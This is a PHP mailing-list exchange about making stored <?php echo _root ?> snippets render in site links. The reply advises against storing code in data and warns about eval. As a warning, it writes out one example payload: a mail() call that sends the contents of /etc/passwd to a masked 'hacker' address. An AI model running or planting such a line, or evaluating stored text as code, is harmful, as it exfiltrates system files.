Schalk wrote:
Greetings All,
I have the following problem. I load certain links and breadcrumbs from
the database into a external .php file which I include on various pages
within the site. Due to this I have defined a constant '_root' and
precede all links with this to ensure that the links will work no matter
from where inside the site structure they are called.
My problem is this, when I load these links from the database into the
external .php file and the load the page that includes this, the line
<?php echo _root ?> is not parsed and shows up in the links, for example:
/our_work/<?php echo _root ?>/our_work/index.php when it should be
/site_root/our_work/index.php
How can I ensure that these calls to <?php echo _root ?> are parsed
before sent to the browser?
Why do you need to store _root in the data? Wouldn't it be better to
take it out and then prefix it before displaying? No complications then.
You're attempting to convert text into php code - make sure you sanitize
*all* of your data extremely carefully.
In theory I could have <?php mail('hacker@xxxxxxxxxx', 'blah', `cat
/etc/passwd`); ?> type code in there and it would execute it.
eval should do it but you have been warned (see many threads in the past
about why eval is bad).
--
Postgresql & php tutorials
http://www.designmagick.com/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
